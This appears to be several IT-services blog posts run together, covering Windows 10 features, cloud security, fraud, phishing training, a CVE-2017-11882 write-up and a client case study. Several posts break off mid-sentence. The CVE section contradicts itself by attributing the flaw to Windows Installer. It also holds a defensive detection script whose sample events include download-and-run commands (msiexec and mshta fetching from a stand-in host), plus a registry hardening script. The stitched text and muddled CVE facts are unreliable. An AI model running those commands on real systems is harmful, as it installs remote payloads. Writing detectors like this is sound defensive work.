Over the years there have been many versions of Windows such as Windows 8, Windows Vista, and Windows XP. Windows 10, the latest update from Microsoft, has many unique features that distinguish it from its predecessors. While the previous versions ran mainly on laptops and desktops, Windows 10 is designed to run equally well on tablets. One of the best features of this update, which is also known as Spring Creators Update, is that it takes very little time to install – just under thirty minutes. While the previous updates used to take a lot of time, this new version is very time effective. Windows 10 has many other distinctive features that are very useful for many small businesses.

Cortana on Desktop

Windows 10 brings voice-controlled digital assistance in the form of Cortana to computers. Now you can interact with or give commands to your computer without lifting a finger. You don’t need to type – just tell your computer if you want to launch a PowerPoint presentation, need a specific file, or want to look at specific photos. Your PC can do all this while you work on, say, an interdepartmental email.

Timeline

Timeline has replaced the Task Viewer icon beside the Windows taskbar. This new feature allows the user to view the activity history of their desktop. If you are looking for a file that you were working on last week, Timeline will help you find it quickly. Just click on the Task View button on the taskbar, and you will be able to see all your open files and applications. It is a convenient way to see what applications are running. Windows will display photos, folders, and documents according to the date that they were last used.

Privacy

Another security feature of Windows 10 is the new Windows Diagnostic Data Viewer. This feature allows you to view the amount of information that Microsoft can access from your computer.
You can keep your data safe by fine-tuning privacy settings which concern application usage, browser history, web permissions, and connected devices.

The Start Menu is back!

In the previous update the Start Menu was eliminated, but in Windows 10 we can see its revival. The bottom left shows the Start Button, and when you click on it, two panels appear side by side with the left side showing the most used applications. The right side displays a list of live tiles that you can resize, reorganize, and customize. There is a power button at the top similar to Windows 8 for features such as Standby, Hibernate, and Shut down.

Nearby Sharing

Another simple feature that makes office work so much easier is Nearby Sharing, which you can enable from the Control Panel. Select the computer you want to send the file to and then click on the Share button in the Photos app or the Edge browser. The computer will receive a notification asking it to accept or decline the file. This ensures that file transfers can happen without unreliable network folders, beat-up USB devices, or empty email messages.

Snap Assist

In this update, the Snap View feature has also been updated, which allows users to open multiple windows side-by-side without being limited by their screen’s resolution. This feature also suggests different apps that you can open to fill the available space.

Swift Pair

This feature allows you to connect to a Bluetooth device within the desktop’s range. You will automatically receive notifications whenever there is a connection opportunity. With Windows 10 you can use wireless headphones to make a call or try out a wireless keyboard by just clicking connect.

Microsoft Edge

The new browser called Microsoft Edge has replaced the old Internet Explorer. This browser has many impressive features such as Cortana integration, which allows you to pull up contextual information without having to search through emails.
It has an annotation tool which lets you write anything and share it with your friends on social networks without leaving the browser, and PDF support which makes reading easier by improving the layout of long articles.

Tablet Mode

Windows 10, unlike Windows 8, makes a clear differentiation between tablets and desktops. In Windows 8, if you happen to be using a mouse and keyboard, by default, you will be in desktop mode.

Action Center

The Action Center in Windows 10 has been expanded to allow easy access to frequently used settings such as tablet mode and Wi-Fi connectivity. It also shows all essential notifications as soon as your computer receives an update.

Windows 10 has many impressive features which were missing in the previous update. It is faster, provides invaluable security protection and makes multitasking much easier. Update your computer today to enjoy all the benefits of this new operating system.
Moving to “the cloud” is good business sense – the cloud makes financial sense as opposed to the costly real estate involved with server expansion and never-ending data needs. But how can you protect yourself and your data in something you can’t see, touch, or control?

“Change is scary.” It’s a phrase often uttered in response to big news that means change on the grand scale; something big is looming. The reference to change being “scary” really has to do with human nature and the fear of the unknown. But are we really afraid of the unknown? Or is this more to do with apprehension over something we don’t yet fully understand? You’ll pay a small fortune to a therapist to get the answers to all of those questions, but the bottom line really is just that change makes us nervous for all of those reasons. When the discussion turns to the cloud, this intangible and invisible “thing” that is ever-evolving and so adaptable that it’s seemingly different for everyone, our collective guard is up.

The reality is that the cloud is only invisible to us – these storage servers do physically exist somewhere, using another entity’s real estate and power supply. Hired staff maintain and protect these servers on your behalf. The cloud is scalable based on your needs, meaning you can secure more or less storage space as your business needs change. Win-win-win, right? Yes and no.

Myth: I’m paying someone else to store my data, so the burden of security is on them.
Fact: It’s your data being stored in the cloud, so you still need to think about security. You have a duty to protect the information of customers and clients, and if there is a data breach or other cybersecurity vulnerability, there is still a liability.

Myth: Cloud providers are super high-tech and impenetrable.
Fact: Your data is stored on third-party servers and accessed via an Internet connection.
Any reputable cloud solution provider employs incredibly strict security measures and keeps abreast of the latest cybersecurity news – so you don’t have to. That doesn’t mean, though, that you don’t need to worry about secure access and taking every precaution you can to prevent unauthorized access through a breach on your end.

Myth: My cloud solution knows what they’re doing, so I don’t have to.
Fact: You are paying an expert to provide you a service, but that doesn’t mean you don’t need to be aware or your team doesn’t need to be knowledgeable. More importantly, why would you not want to know how your cloud provider is protecting you – and your data? Would you be concerned if servers were stored in an unlocked and unguarded facility? What about if your data was backed up on hard drives that sat exposed to the elements or accessible to anyone? Or worse – if your data wasn’t being backed up at all? That’s like letting your staff keep passwords to their network or cloud access on a notepad on their desktop for the world to see! Don’t let human error be responsible for a breach – keep informed.

Did you know that more than half of organizations that experience a data loss, especially those classified as “small and medium businesses (SMBs)”, suffer a catastrophic impact and aren’t able to recover, whether the loss came from a cybersecurity breach or not? That means if there is a data breach, the odds aren’t in your favor to recover at all. The most important thing to remember is that a 100% cybersecurity guarantee isn’t possible, but that every business can take steps to make sure they’re protected, and so is their cloud service access.

How can you make sure your data is secure?

Establish a formal process with your team.
Does each member of your team understand their responsibility as it relates to security measures?
Maybe – but the only way to make sure every team member is taking every precaution is to define what measures are in place and what steps need to be taken to protect the brand, the organization, and its data. Ensure the formal process is part of the new team member onboarding so that all staff have the information and understand what is expected – including executives.

Follow the latest security best practices.
Is your network secure? If your IT staff is in-house, make sure there is a process for continuing education. If your organization outsources your managed processes, make sure your trusted partner is employing these same best practices and communicates needs to your organization in a timely and clear manner.
Are passwords complex? Do passwords contain a mix of uppercase and lowercase letters, plus numbers and symbols? Are passwords routinely changed? Passwords shouldn’t be reused in multiple locations, either, and should be unique to users.
Is data backed up? As many as 20% of back-ups are incomplete or corrupt, and some systems are fundamentally flawed. If your organization backs up your own data, even a fraction of your stored data, make sure it’s stored in a secured location with these same best practices above.
Are desktop workstations, mobile access machines, and remote technology all equipped with the latest in active antivirus software?

Proactivity and consistency.
This is probably the most important part of any cybersecurity process. Does your organization provide ongoing training to team members to make sure security measures are kept updated and consistent? Operator error is the most common cause of a data breach!

“An ounce of prevention is worth a pound of cure.” Never are these words truer than in the case of data security! Protecting your data is essentially protecting yourself from cybercriminals who seek to access your data for illicit gain.
Proactive protective safeguards, consistently deployed, really will go the farthest in terms of protecting your organization’s future.

Is the cloud right for you?

You may not have a choice. Recent estimates show that costs and other factors will require organizations to use the cloud in some manner within the next five years
Most business owners are cognizant of the prevalence of fraud in the digital world today. According to Experian’s Global Fraud and Identity Report 2018, almost three-quarters of businesses believe fraud is a growing concern, and nearly two-thirds reported fraudulent losses over the past year.

What is Fraud?

Fraud occurs when an individual’s payment information is used without their authorization. When hackers breach your network and access your customers’ or clients’ sensitive cardholder information, they have many opportunities to commit fraud numerous times. Anytime someone falsifies an identity and “tricks” a system into thinking the person making a purchase is someone other than who they actually are, this is considered to be fraud.

Fraud is Pervasive in Today’s Digital World

This is because the majority of business and consumer data remains vulnerable. As the value of digital information grows, so does the hacker’s motivation to develop methods to avoid detection from the latest technologies. The existing account setup process requires consumers to provide extensive amounts of personal information along with passwords and secret questions. And data breaches provide this information to cybercriminals. When this data is stolen, it’s often used for fraudulent activities.

Fraud is a moving target just like the hackers. New tactics are evolving where criminals combine real and fake information to create new identities. Most business owners just don’t have a handle on this – and they lack confidence in their ability to protect their customers and their companies from fraud. One of the reasons for this is that their initiatives are mostly reactionary rather than proactive as many continue to use legacy cybersecurity technology rather than investing in new, more sophisticated data protection solutions. As a result, every month that goes by increases their vulnerability and exposure to data breaches and fraud.
Fraud is an ever-present and growing risk

For businesses in e-commerce, managing the risk of fraud is a delicate balancing act between ease of use for customers and fraud protection. They struggle with mitigating fraud and providing a positive customer experience. Unfortunately, the customer experience wins out in most cases, and businesses are willing to risk fraudulent losses over losing customers to their competition. Ironically, they are setting their businesses up for reputational damage where they will end up losing customers anyway, fail to gain new ones, and possibly face financial penalties and litigation costs.

The 2017 Cost of Data Breach Study from the Ponemon Institute, sponsored by IBM, puts the global average cost at $3.6 million, or $141 per data record. That’s a reduction from the average cost in 2016, but the average size of data breaches has increased. It’s also worth noting that the average cost of a data breach in the United States is much higher at $7.3 million.

More than 50 percent of businesses say they still rely on passwords as their top form of authentication. And business leaders know that using passwords isn’t the most secure option. But customers are used to them, and business owners want to please them. They also complain that they lack the financial resources to adopt more advanced authentication methods when this would save them legal fees and penalties if/when their customers’ accounts are breached – not to mention their reputation and the future existence of their business. This, of course, is very shortsighted.

How data breaches and fraud are connected

Data breaches and fraud don’t usually occur at the same time and place. Cybercriminals won’t steal a customer’s information and turn around and use it for a purchase from the same business. So it’s not easy for a business to detect when a breach occurs. Data breaches are typically detected by using specific security tools that monitor all payment activity.
Merchants should follow PCI-DSS standards to identify and prevent breaches and remain compliant. PCI-DSS audits will help you find vulnerabilities in your system and reveal inadequacies that must be eradicated.

A successful case of fraud spreads like cancer

If a hacker can get one password, they may have the keys to other password-protected accounts. The more online accounts people open, the greater their risk. And most people have quite a few. If the hacker can figure out the password to someone’s email account, they may also have the key to their credit card and banking accounts as well. You must remain vigilant to prevent data breaches and fraud.

What to do if you suspect fraud

A key indicator of fraud is chargebacks, where a customer disputes a charge on their credit card and you aren’t paid for the service or product. If your chargeback rate increases above a 1% margin, this is a good indication that you’re experiencing fraud. In this case, you should hire a third-party auditor like an IT Managed Services Provider (MSP) to help bring you back into compliance and stop the thieves. They will detect where the problem(s) exist and whether what they find indicates a data breach. PCI-DSS compliance requirements mandate that you do this to stop the fraudulent activity. Of course, you should contact the card processor as well. They will connect you to the card providers who can often identify the point of access or detect a suspicious pattern of activity.

What You Can Do to Reduce Fraud and Data Breaches

Use EMV Technology.
EMV (Europay Mastercard Visa) is the global standard to authenticate payment cards. EMV technology can help you protect your business from fraud. It ensures the card is legitimate and that the person using the card is the authorized user. EMV chips are microprocessors that store and protect cardholder data. They use a unique cryptogram that’s validated by the card issuer.
This makes it more difficult for hackers to break the code and steal card information to commit fraud. Today, if you don’t use an EMV-capable terminal, and the transaction turns out to be fraudulent, you can be held financially liable for that transaction. EMV has been used in the United Kingdom since 2004, and card-present fraud has gone down
Your cybersecurity practices shouldn’t be treated like a game of chance unless you are 300% certain you’re going to win. What can you do to make sure your business isn’t the ultimate loser?

Is technology today the endless cycle of cat-and-mouse, with the bad guys always one step ahead? A quick search for “cybersecurity best practices” will yield millions of results, all with their ideas of what you can do – but does any of it make sense?

Someone busy running a company faces a complex dichotomy: Being too busy running their company to worry about something that won’t directly generate revenue, but not giving enough time and attention to something that could directly impact revenue. Those are two very distinct and different thoughts, but still closely related. Not only is cybersecurity a critical focus of business today, but it’s also the easiest way to fail.

Cybercriminals – hackers – are usually one step ahead of us good guys, but that’s the “cat and mouse” game to them. We respond to cybersecurity breaches that make the news with preventive measures to avoid the same fate and do our best to have enough safeguards in place to protect every element we can. Hackers seek a cybersecurity vulnerability to exploit to their advantage. Their reasons don’t matter – it’s the result that affects their victims. Why do we still have vulnerabilities when we know better?

Myth: Half of small businesses think they’re “too small” for a hacker to target.
Truth: Small businesses make easier targets for many reasons. They often don’t have the tech budgets that the Fortune 500 companies do in order to take every precautionary measure to avoid being hacked. Smartphones are major targets of hackers now, given more than half of all web traffic is reported to take place via mobile devices. Smartphones don’t have the same level of protection, making them easy targets, and therefore easy points of entry to a cybersecurity vulnerability.
Imagine pressing a thumbtack into a hairline fracture on a porcelain plate – this one weak spot has the potential for this singular action to shatter the plate into thousands of pieces. Now, imagine this plate is your proprietary data, and this thumbtack is a hacker. Can you see the potential damage?

Myth: Employees of small businesses know more about the company and are more invested in its success, therefore take the time to safeguard their actions.
Truth: The dedication of staff to their employer has nothing to do with cybersecurity. Modern cybercriminals are targeting critical data: consumer information, accounts with intellectual property, financial information about both the company and consumers. Three out of every four small businesses have no formal cybersecurity policies or protocols in place for staff, nor training to discuss the latest threats and how to thwart them. Hackers know this – oh, yes, they know – and they also know the small business is less protected than those Fortune 500 companies. This is a lethal combination. Nearly two-thirds of small businesses have yet to address security regarding mobile devices or enact formal policies for mobile device use as it pertains to professional operations.

Myth: Small businesses can bounce back faster after a breach.
Truth: Half of all small businesses don’t have a disaster preparedness plan in place for recovery should they be impacted by a cybersecurity threat, a “data breach”. It’s reported that less than half of all small businesses back up their data weekly. Let that sink in. The data loss in the event of a hack could have catastrophic results for as many as half of all small businesses. In the event of a breach, companies of any size consider the data loss and downtime to have the greatest impact, followed by the revenue loss – but most of the time, the impact to a company’s reputation isn’t considered until already in clean-up mode.
If you’re ready to win at “Tech Truth or Dare”, here are the new rules of the game:

Do you know what needs to be protected?
What data do you store? How is your data stored? What protective measures and security protocols are in place? Where are the “holes”? This last question is the most important, and it’s a smart decision to hire an expert to help you with this one.

What formal policies need to be updated – or put in place?
Every business needs an official cybersecurity policy. This policy should also be updated annually, at the minimum. Formalizing a policy can make sure everyone that has access to your data follows the same procedures and the strongest safeguards are in place. This should include:
Password protocols: Passwords should be unique, complex, and changed regularly.
System updates: Check for the latest updates to all applications and security releases.
Privacy settings: Verify that users have the most secure privacy settings on their desktop and laptop computers, and smartphones and mobile devices.

What is your plan for how to handle a disaster?
Perhaps an extension of the previous question, but no less important is how to handle a hack or breach should one occur. You’ve taken all the necessary steps and precautions, but you still had a disaster – now what? Best practices include daily back-up of your critical resources – which you’ll need to identify – and then test the process to ensure it’s sufficient, just in case.

Talk to experts.
You are an authority in what you do, and your sales pitch to your customers focuses on your expertise. Why wouldn’t you hire experts to protect your business?

Is your training sufficient?
Make sure your staff is aware of the steps needed for Internet safety, email security, network threats, and how to detect and protect in the event of each. Equally important is what needs to be done if something happens and they suspect a threat.

Prevent your business from becoming a victim of a hacker this year and win the game!
Make 2018 the year you have an ironclad cybersecurity program,
Sure, yoga teaches the flexibility that is key to adapting to your surroundings. But in practicing daily self-awareness, the saying “A team is only as good as its weakest player” is rarely truer than in the world of cybersecurity. How does your team stack up?

Target knows. Sony knows. Ashley Madison definitely knows. That’s the bad thing – an organization may only realize how strong — or weak — their cybersecurity position is once there is a successful cyberattack. The nature of the attack doesn’t matter, nor does the overall effect. The damage is done, and the organization goes into clean-up mode. In the days immediately following, the phrase heard most is “How did this happen?” when the real question should be “How can we prevent this from happening again?”

Subtlety isn’t the goal of a hacker, nor is it their strongest attribute. The modus operandi of any hacker is singular: find a cybersecurity vulnerability and exploit it to their advantage. The rest doesn’t matter. You likely disagree, but we think you’ll realize this is exactly the case. After all, we want to help you beef up your security and prevent a vulnerability rather than shift into defensive mode upon clean-up from an attack. The latter is going to shift your focus for up to a year of reactivity, while a little extra focus now will prolong your proactive position. An ounce of prevention is worth a pound of cure, especially in this type of situation.

At the most basic level, your organization’s cybersecurity is based on your team’s awareness level – which can easily be assessed and addressed in training. Data breaches caused by hackers are one thing, but the simplest way for a hacker to gain access is by finding a weak link – a human operator – and using sneaky tricks to exploit weakness from that angle. A hacker can use pretty low-tech approaches in this way, like phishing. Does your cybersecurity awareness training still include exercises and tips on old-fashioned tricks like phishing?
It’s amazing the simple tactics some of these hackers will resort to – but the reason is that these tricks still work on us. A 2017 study by Google reported that phishing was still one of the most effective tactics used for hacking a user account.

Phishing is the practice of sending emails pretending to be from a reputable company, like Google or Apple, to get recipients to reveal personal information like passwords to the sender. Perhaps it’s because we don’t see ourselves as targets anymore, thinking hackers only target the “big fish” for the bigger reward – a unique tactic called “whaling” – but the reality is that everyone is a target. There are no exceptions. Any computer user can be an access point for a cyberattacker because any computer can serve a greater purpose for a cybercriminal.

Why does phishing still work? Because we let it. We start to shift our focus to the newer or more sophisticated methods hackers use, and we don’t maintain vigilance on the basic approaches in cybersecurity awareness training. One click is sometimes all it takes to turn a user into a victim – and for a hacker to wreak havoc on a network. One click can lead to a malware installation, identity theft, or worse, ransomware. That click could cost an organization millions of dollars.

Ransomware is like a virus, where a hacker accesses a computer or network and places a file or code that blocks user access, and requires the user to pay money – a ransom – to the cyberattacker to regain access to the computer or network.

Remember when we said all it takes is one click? It’s true. In 2017, hackers sent emails to staff at Chipotle and managed to trick someone into one click, compromising the point-of-sale (POS) machines at locations that enabled the hackers to gain access to the credit card data of millions of customers.
The worst part is that even end users who are in the tech industry have been tricked; Google and Facebook have both been affected to the tune of $100 million each because of successful phishing attempts.

Did you know that some companies hire former (“rehabilitated”) cybercriminals as cybersecurity specialists – true experts – to help mold technology teams in charge of cybersecurity and oversee cybersecurity awareness training programs? These are probably among the most solid and effective programs in existence!

One way organizations have used to test the awareness of their team is by executing an internal phishing campaign. This is a campaign where the company has total control of the phishing attempt but tests the staff to see where the weaknesses are. The results only help improve overall training and cybersecurity. This approach is wildly successful in getting an accurate picture of your team’s awareness. Who fails the test? How far will some employees allow a hacker to get before realizing they are being phished? Where does your training lack focus that the attempt was successful?

A few things to keep in mind with this approach:

While internal phishing campaigns are helpful, don’t shift your training focus to only weaknesses discovered in this process.
Be careful not to call out any one particular team member or access point; the goal isn’t to embarrass team members but to improve your team’s awareness overall.
Don’t aim for only those team members you consider to be the weakest when it comes to cybersecurity knowledge; you’d be surprised at where an organization may discover vulnerabilities. On this note, it’s helpful to provide one-on-one level training catering to these team members, but you can still do so as a company by offering exercises aimed at specific weaknesses without placing blame.
Keep the phishing exercise as realistic as possible, so the teachable moments that result are valid and credible.
When your exercises and training give you enough insight to update your training, keep the training outline simple with a few target areas that are comprehensive enough
You May Be Sabotaging Yourself!

This latest cyber-attack uses Windows Installer to download malware onto your computers. What is CVE-2017-11882, and what does it do? How should you detect and protect against it? What other similar malware attacks have come up in the past? These are all questions you should be asking yourself in order to develop the best defense against this type of attack.

It seems like just when we’ve learned how to protect against one type of malware, four others pop up. Recently, Microsoft began combating CVE-2017-11882, which exploited a vulnerability in Microsoft Office. Then, just as expected, as one weakness was fought, a new one popped up. CVE-2017-11882 exploited a new vulnerability within the Windows Installer.

The previous version of CVE-2017-11882

The previous version would exploit the vulnerability using the Windows executable mshta.exe, and then run a PowerShell script which would download and execute the payload. The problem with this is that while previous versions have edited Microsoft Installer, this version doesn’t edit it. What it actually does is use Microsoft Installer for the exact purpose that it was built for, to install things. Only this time it forces it to install malicious programs on your computer.

The new attack uses msiexec.exe as part of the Windows Installer service. For example, the user could receive an email with an attachment. Since the attachment seems legitimate, the user opens and begins downloading it. This attachment installs a malicious MSI package through the use of CVE-2017-11882. This then, in turn, releases either an MSIL or a Delphi binary. This binary will then launch another instance of itself. This duplicate binary is then hollowed out to create a new home for the new malware payload.

How does CVE-2017-11882 go undetected?

This package provides a compression layer that file scan engines need to process and enumerate in order to detect the file as malicious.
This is similar to movies where a complicated retina scan is needed to gain access to a specific area of the building, yet the spy is still able to get in, due to his fancy contact lens. The system scans the lens and thinks that he is an authorized user, and allows him passage. Similarly, because of this compressed file mask of sorts, it’s hard to detect and identify the actual payload since it is contained in the heavily obfuscated MSIL or Delphi binary.

What can we do to protect against CVE-2017-11882?

Sometimes there are simple solutions to significant problems. For example, one of the easiest ways in which you can defend yourself and your business from CVE-2017-11882 is by having a strong email policy for your company. You should use strong passwords, with both capital and lowercase letters, as well as some symbols. You should never write passwords down, or use the same password for multiple accounts. Doing so can result in a hacker not only having access to your email but also to any and all accounts. Also, you should change your passwords often; it is recommended to change them every two months. This way you can stay ahead of the hackers: before they have an opportunity to figure out your password, you will have already changed it.

Email and Passwords

Besides password strength, you should also focus on training employees about the dangers of email attacks, such as those that use the Microsoft Installer. It’s vital that they are trained not to click or open any suspicious emails. For example, employees should be trained to recognize phishing emails that may carry malware, and also to know how to isolate and flag these emails. This way other employees are immediately notified of the email, and won’t themselves fall victim. Employees should always check emails and names of unknown senders to ensure they are legitimate. They should always look for inconsistencies or style red flags such as grammar mistakes, capital letters, or excessive use of punctuation.
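
The delivery chain described above (an Office document that launches mshta.exe and PowerShell, or msiexec.exe, followed by a binary that starts a second copy of itself) leaves traces in process-creation logs. The following is an added example, not code from the original article or from Microsoft: it flags those three patterns in constructed sample events. The field names (Sysmon Event ID 1 style), the rule names, the example.invalid host and the EQNEDT32.EXE parent (the Office Equation Editor, the component CVE-2017-11882 affects, which the article does not name) are assumptions.

```python
import json
import ntpath
import re

# Constructed sample events, not real telemetry. Field names follow Sysmon
# Event ID 1 (process creation); map them to your own log schema.
SAMPLE_EVENTS = r'''
{"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Program Files\\Common Files\\microsoft shared\\EQUATION\\EQNEDT32.EXE", "CommandLine": "msiexec /i http://files.example.invalid/invoice.msi /q"}
{"Image": "C:\\Windows\\System32\\mshta.exe", "ParentImage": "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE", "CommandLine": "mshta http://files.example.invalid/a.hta"}
{"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "msiexec.exe /i C:\\Users\\alice\\Downloads\\editor-setup.msi"}
{"Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\inv.exe", "ParentImage": "C:\\Users\\alice\\AppData\\Local\\Temp\\inv.exe", "CommandLine": "inv.exe"}
{"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "msiexec /qn /package https://files.example.invalid/tool.msi"}
{"Image": "C:\\Windows\\System32\\msiexec.exe", "ParentImage": "C:\\Windows\\System32\\services.exe", "CommandLine": "C:\\Windows\\System32\\msiexec.exe /V"}
'''

# Office processes that should not normally start installers or script hosts.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                  "eqnedt32.exe"}
# Child processes named in the article's description of the attack chain.
CHAIN_CHILDREN = {"mshta.exe", "powershell.exe", "msiexec.exe"}

# msiexec install switch (/i or /package) followed by an http(s) URL.
REMOTE_INSTALL = re.compile(r'(?:^|\s)[/-](?:i|package)\s+"?https?://', re.I)
# msiexec quiet / reduced-UI switches: /q, /qn, /qb, /qr, /qf, /quiet.
QUIET_SWITCH = re.compile(r'(?:^|\s)[/-]q(?:n|b|r|f|uiet)?(?=\s|$)', re.I)
# Directories a standard user can write to (heuristic, extend as needed).
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\")


def classify(event):
    """Return the names of the (hypothetical) rules that one event matches."""
    image = event.get("Image", "")
    parent = event.get("ParentImage", "")
    cmdline = event.get("CommandLine", "")
    child_name = ntpath.basename(image).lower()
    parent_name = ntpath.basename(parent).lower()
    hits = []

    # Rule 1: an Office application spawns mshta, PowerShell or msiexec.
    if parent_name in OFFICE_PARENTS and child_name in CHAIN_CHILDREN:
        hits.append("office_spawns_" + child_name.split(".")[0])

    # Rule 2: msiexec installs a package straight from a URL; a quiet switch
    # means the user saw no installer dialog, so it is reported separately.
    if child_name == "msiexec.exe" and REMOTE_INSTALL.search(cmdline):
        quiet = QUIET_SWITCH.search(cmdline)
        hits.append("msiexec_remote_quiet" if quiet else "msiexec_remote")

    # Rule 3: a binary in a user-writable directory starts a copy of itself,
    # the step the article says precedes hollowing of the duplicate process.
    lowered = image.lower()
    if image and lowered == parent.lower() and any(d in lowered for d in USER_WRITABLE):
        hits.append("self_respawn_from_user_dir")
    return hits


def scan(text):
    """Classify JSON-lines events; return (line number, rule names) per hit."""
    findings = []
    for lineno, line in enumerate(text.strip().splitlines(), start=1):
        if not line.strip():
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            event = None
        if not isinstance(event, dict):
            # Keep malformed records visible instead of silently dropping them.
            findings.append((lineno, ["unparseable_event"]))
            continue
        hits = classify(event)
        if hits:
            findings.append((lineno, hits))
    return findings


if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_EVENTS):
        print(f"event {lineno}: {', '.join(hits)}")
```

The interactive install from explorer.exe and the service-started msiexec.exe are left alone, which is the distinction that matters when Windows Installer cannot simply be switched off.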
Restrict or disable Windows Installer

A second way to protect yourself is by limiting or completely disabling the Windows Installer itself. This would prevent potential attackers from being able to install their malicious software on your users’ systems. This way, only the system administrator could install programs. Controlling the access and spread of these attacks can significantly help your company to protect itself. Rather than trying to put out fires all over the place, you can then focus on one area and defend it appropriately.

Microsoft Recommendations

Microsoft recommends that if you think that you are infected with this malware, you should use your security software to detect and remove the threat. Remember to use appropriate software based on which operating system you are using. Microsoft states that Windows Defender works best for Windows 10 to detect and remove this malware. Microsoft Security Essentials works for Windows 7 and Windows Vista and has the appropriate defense and removal for this malware. After detection and removal, you should update your software to further protect yourself from future exploits.

Similar previous attacks

Attacks like this are not rare in the least. For example, in November of 2017, there was also a vulnerability in Microsoft Office 2000. This flaw allowed hackers to install malware without user interaction. So, while you were just writing a report in Microsoft Word, hackers were downloading malware onto your computer without your knowledge or permission. This could easily be fixed by updating software, such as using only the most recent version of Microsoft Office, so that your computers and networks are protected against the latest threats.

We should stay vigilant to protect our network and our businesses. Knowing what is out there and what can wreak havoc on your business is half the battle.
The other half is updating your staff and your software to ensure that you are providing the most vigorous defense possible. Look for vulnerabilities in your system and business. Additionally, it is crucial to stay up to date with the latest cyber-attack news. This will keep you in the know as
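
The Windows Installer restriction described under "Restrict or disable Windows Installer" can be audited and applied through the Windows Installer policy values in the registry. The PowerShell below is an added example, not code from the original article or from Microsoft; the function names are hypothetical, and it assumes the standard `DisableMSI` and `AlwaysInstallElevated` policy values under the Windows Installer policy key.

```powershell
# Added example: audit and optionally enforce the Windows Installer policy.
# Registry policy values (set by the "Turn off Windows Installer" Group Policy):
#   DisableMSI = 0  installer allowed for every install
#   DisableMSI = 1  only administrator-deployed (managed) packages install
#   DisableMSI = 2  Windows Installer disabled entirely
# Function names below are hypothetical helpers, not built-in cmdlets.

$InstallerPolicyKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'

$DisableMsiMeaning = @{
    0 = 'Enabled for all installs'
    1 = 'Blocked for non-managed installs (managed packages only)'
    2 = 'Disabled for all installs'
}

function Get-InstallerPolicyValue {
    param(
        [Parameter(Mandatory)][ValidateSet('HKLM', 'HKCU')][string]$Hive,
        [Parameter(Mandatory)][string]$Name
    )
    $path = "${Hive}:\$InstallerPolicyKey"
    $item = Get-ItemProperty -Path $path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }   # key or value absent: not configured
    return [int]$item.$Name
}

function Get-MsiPolicyReport {
    $disableMsi = Get-InstallerPolicyValue -Hive HKLM -Name DisableMSI
    # AlwaysInstallElevated only takes effect when set to 1 in BOTH hives; it lets
    # any user run MSI packages with elevated rights, so it should stay off.
    $elevMachine = Get-InstallerPolicyValue -Hive HKLM -Name AlwaysInstallElevated
    $elevUser    = Get-InstallerPolicyValue -Hive HKCU -Name AlwaysInstallElevated

    $meaning = 'Not configured (operating system default applies)'
    if ($null -ne $disableMsi) { $meaning = $DisableMsiMeaning[$disableMsi] }

    [pscustomobject]@{
        Computer              = $env:COMPUTERNAME
        DisableMSI            = $disableMsi
        Meaning               = $meaning
        UserInstallsBlocked   = ($disableMsi -in 1, 2)
        AlwaysInstallElevated = ($elevMachine -eq 1 -and $elevUser -eq 1)
    }
}

function Set-MsiRestriction {
    [CmdletBinding(SupportsShouldProcess)]
    param(
        # 1 = managed installs only, 2 = disable completely (also blocks
        # legitimate MSI-based software and updates, so test before rollout)
        [ValidateRange(1, 2)][int]$Level = 1
    )
    $path = "HKLM:\$InstallerPolicyKey"
    if ($PSCmdlet.ShouldProcess($path, "Set DisableMSI to $Level")) {
        if (-not (Test-Path -Path $path)) {
            New-Item -Path $path -Force | Out-Null
        }
        New-ItemProperty -Path $path -Name DisableMSI -Value $Level `
            -PropertyType DWord -Force | Out-Null
    }
}

# Audit first; the report does not change anything.
Get-MsiPolicyReport | Format-List

# Preview the change, then rerun from an elevated prompt without -WhatIf to apply.
Set-MsiRestriction -Level 1 -WhatIf
```

On domain-joined machines the same setting is normally deployed through Group Policy (Computer Configuration > Administrative Templates > Windows Components > Windows Installer) rather than written to the registry on each machine.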
Sunair Awnings & Solar Screens protects their customers from the sun and rain, and they’ve been doing so since 1880. They lead the industry with the highest quality, most innovative custom-made retractable awnings and shade systems. In fact, Sunair was the first company to introduce the European-style retractable awning to the North American Market.

Hammett Technologies has been Sunair’s IT Consultant for the past 11 years. Previously, Vice President of Sales, Jim Wills, acted as their in-house IT guy and admits he wasn’t very good at it.

The Situation: Sunair Needed an IT Consultant Who Was Knowledgeable and Capable.

Previously, Sunair used a slew of other IT providers, but none of them delivered the service they required. An essential requirement was that their IT Consultant understood their business and implemented technology based on their unique needs.

“We were outsourcing our needs one by one at first, and worked with several different IT services,” says Jim Wills, Vice President of Sales at Sunair. “We didn’t have a CTO or CIO, and while my knowledge was good, our needs very quickly exceeded my technical expertise.”

After working with so many other providers, Sunair knew they needed an IT Partner who would put their needs first and integrate technology that was right for their growing business.

“We quickly realized how different Hammett was from other IT providers. Hammett Technologies is so focused on our needs that they are like an extension of our company, rather than an outside provider,” says Wills.

The Solution: Hammett Technologies Provides the Right Guidance and Saves Sunair Money.

Hammett Technologies met all of Sunair’s technology needs and more. Our experts focus on providing specialized IT services that transform as a company grows. Along with a helpdesk, IT management, and support, we act as Sunair’s CIO, CISO, and CTO. As a result, we’ve saved them a great deal of money.
Jim from Sunair went on to say, “Hammett’s current projects are very exciting and will contribute to our bottom line, providing more for us than they will cost. They’re installing and implementing a VOIP system which will give us a great return and the ability to provide excellent customer service. Now we can balance customer support calls between our two plants. This will help us provide the level of service our customers deserve without having to hire additional staff”.

In 2017, our IT Consultants helped Sunair save between $15,000 and $20,000 by evaluating their current systems rather than letting them purchase vendor-recommended hardware. We also helped Sunair save on staff and in-house IT services.

“Hammett implemented a CRM system for us,” continues Wills. “This allows all members of our sales and service team to access customer information and track all the transactions that occurred over time. Now, they can retrieve this information immediately.”

The Outcome: Hammett Streamlined Sunair’s Operations While Improving Their Bottom Line.

